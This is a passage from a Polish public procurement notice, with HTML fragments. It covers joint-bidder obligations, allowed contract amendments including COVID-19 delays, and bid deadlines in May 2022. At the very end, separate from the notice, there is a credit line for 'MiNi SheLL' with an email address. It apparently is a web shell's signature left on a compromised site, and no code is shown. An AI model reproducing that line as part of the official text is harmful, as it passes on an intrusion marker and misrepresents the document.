dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu<br/>udostępniającego zasoby, a ponadto – na wezwanie Zamawiającego – także 6.2.1. SWZ dot.<br/>podmiotu udostępniającego zasoby;<br/>7.2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w tym dot. podmiotu<br/>udostępniającego zasoby – jeżeli dotyczy);<br/>7.2.4. ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają<br/>warunek udziału w postępowaniu, a także ewentualnie podmioty udostępniające zasoby -<br/>dokumenty, o których mowa w pkt 6.1.5.2 SWZ;<br/>7.2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument,<br/>także dokument wskazany w pkt 6.2.2. SWZ.<br/>7.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum)<br/>ponoszą, zgodnie z art. 445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienie zabezpieczenia należytego wykonania umowy – jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności<br/>2.	Zakazuje się istotnych zmian postanowień zawartej Umowy w rozumieniu art. 454 ust. 2 ustawy Pzp.<br/>3.	Zmiana Umowy dokonana z naruszeniem przepisu ust. 2 jest nieważna. <br/>4.	Zamawiający przewiduje możliwość wprowadzenia zmian do treści Umowy w zakresie: <br/>1)	terminu zakończenia realizacji przedmiotu Umowy określonego w § 2 ust. 1 Umowy, w przypadku wystąpienia okoliczności mających bezpośredni wpływ na realizację przedmiotu Umowy i stanowiących przeszkodę w jego realizacji w szczególności: <br/>a)	konieczność usunięcia wad, które ujawniły się dopiero na etapie realizacji przedmiotu <br/>Umowy, <br/>b)	wstrzymanie realizacji Umowy przez Zamawiającego z przyczyn niezawinionych przez Wykonawcę, <br/>c)	konieczność wprowadzenia zmian w dokumentacji projektowej dotyczącej przedmiotu <br/>Umowy, <br/>d)	awarie, <br/>e)	konieczność wykonania usług zamiennych itp.) <br/>jeżeli te okoliczności nie są zawinione przez Wykonawcę. Wówczas termin realizacji przedmiotu Umowy może ulec zmianie o czas odpowiadający wpływowi tych przeszkód na czas niezbędny na ukończenie przedmiotu Umowy, <br/>2)	sposobu wykonania zobowiązania, w tym wykonania dostaw i usług zamiennych czy zmiany technologii, o ile zmiana taka: <br/>a)	jest korzystna dla Zamawiającego i/lub jest konieczna w celu prawidłowego wykonania <br/>Umowy lub <br/>b)	wynika z konieczności dostosowania sposobu wykonania Umowy do obowiązujących przepisów prawa lub <br/>c)	jest uzasadniona ze względów technicznych, w tym wynika z przeprowadzonego nadzoru autorskiego, w szczególności gdy konieczność zrealizowania Umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji projektowej aranżacji, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy lub <br/>d)	umożliwi poprawę jakości lub <br/>e)	wynika z niedostępności na rynku materiałów wskazanych w dokumentacji projektowej aranżacji, a spowodowana zaprzestaniem ich produkcji lub ich wycofaniem z rynku lub <br/>f)	wynika z pojawienia się na rynku materiałów nowszej generacji bądź nowszej technologii wykonania zaprojektowanych usług, pozwalających na zaoszczędzenie czasu realizacji Umowy lub kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego przedmiotu Umowy lub <br/>g)	zmiany określone powyżej będą dostosowywać sposób wykonania przedmiotu Umowy do potrzeb wynikających z opisanych powyżej okoliczności. <br/>3)	podwykonawstwa, za uprzednią zgodą Zamawiającego, z zastrzeżeniem postanowień § 4 ust. 3 Umowy. Zmiana może dotyczyć, o ile nie jest to sprzeczne z postanowieniami Umowy, SWZ, powierzenia podwykonawcom innego zakresu części zamówienia niż wskazany w ofercie Wykonawcy oraz zmiany podwykonawcy na etapie realizacji Umowy, pod warunkiem zgodności takiej zmiany z przepisami ustawy Pzp; <br/>c.d. w sekcji IX Pozostałe informacje <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. informacji z pkt 3.6 <br/>10.Za datę przekazania oferty, dokumentów, informacji i oświadczeń oraz ich cyfrowych<br/>odwzorowań przyjmuje się datę ich przekazania na ePUAP lub datę i godzinę serwera<br/>pocztowego Zamawiającego.<br/>11. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w<br/>postępowaniu określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród<br/>dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx,<br/>.odt., ze szczególnym wskazaniem na .pdf.<br/>12. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>może zawsze dokonać notariusz. Ponadto szczegółowe zasady poświadczania różnych<br/>kategorii dokumentów opisuje § 6 ust. 3 oraz § 7 ust. 3 Rozporządzenia przywołanego w pkt 11<br/>powyżej.<br/>13. W Formularzu oferty wartości liczbowe należy wpisywać w każdej pozycji wyłącznie cyframi,<br/>a w miejscach gdzie jest to wyraźnie wskazane także słownie (nie stosuje się wyrażenia „jw.” i<br/>równoważnych).<br/>14. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język<br/>polski.<br/>15. Zamawiający zastrzega sobie ponadto możliwość żądania, aby w przypadku wskazania<br/>przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których<br/>mowa w pkt 6.1.2. lit. a SWZ, pod określonymi adresami internetowymi ogólnodostępnych i<br/>bezpłatnych baz danych, przedstawił on tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego podmiotowych środków dowodowych lub dokumentów.<br/>16. W zakresie nieuregulowanym ustawą lub niniejszą SWZ do podmiotowych środków<br/>dowodowych, oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 8.4. SWZ<br/>powyżej oraz rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy.<br/>c.d. z pkt 7.4.<br/>4) zmiany terminu realizacji, o którym mowa w § 2 ust. 1 Umowy, w przypadku gdy Wykonawca z przyczyn od niego niezależnych nie może terminowo zrealizować przedmiot Umowy, a przyczyny te są bezpośrednio związane z wystąpieniem COVID-19. Strony Umowy niezwłocznie, wzajemnie informują się o wpływie okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie przedmiotowej Umowy, o ile taki wpływ wystąpił lub może wystąpić. W takiej sytuacji stosuje się odpowiednio przepis art. 15r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. z 2020 r. poz. 1842 ze zm.). <br/>Zamawiający po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których mowa powyżej, wpływają na należyte wykonanie Umowy, w uzgodnieniu z Wykonawcą dokona zmiany Umowy, w szczególności przez zmianę terminu wykonania Umowy, o którym mowa w § 2 ust. 1 Umowy w sytuacji w szczególności wstrzymania dostaw materiałów objętych zamówieniem, trudności w dostępie do materiałów związanych z wystąpieniem COVID-19. Podstawą powyższej zmiany, jest udokumentowanie wpływu COVID-19 na realizację Umowy poprzez złożenie przez Wykonawcę oświadczenia z uzasadnieniem lub/i dokumentu potwierdzającego wpływ okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie Umowy i akceptacja Zamawiającego. Strony ustalą nowy termin, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu Umowy równy będzie okresowi opóźnienia. <br/>Obowiązkowa wizja lokalna patrz pkt 3.18 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com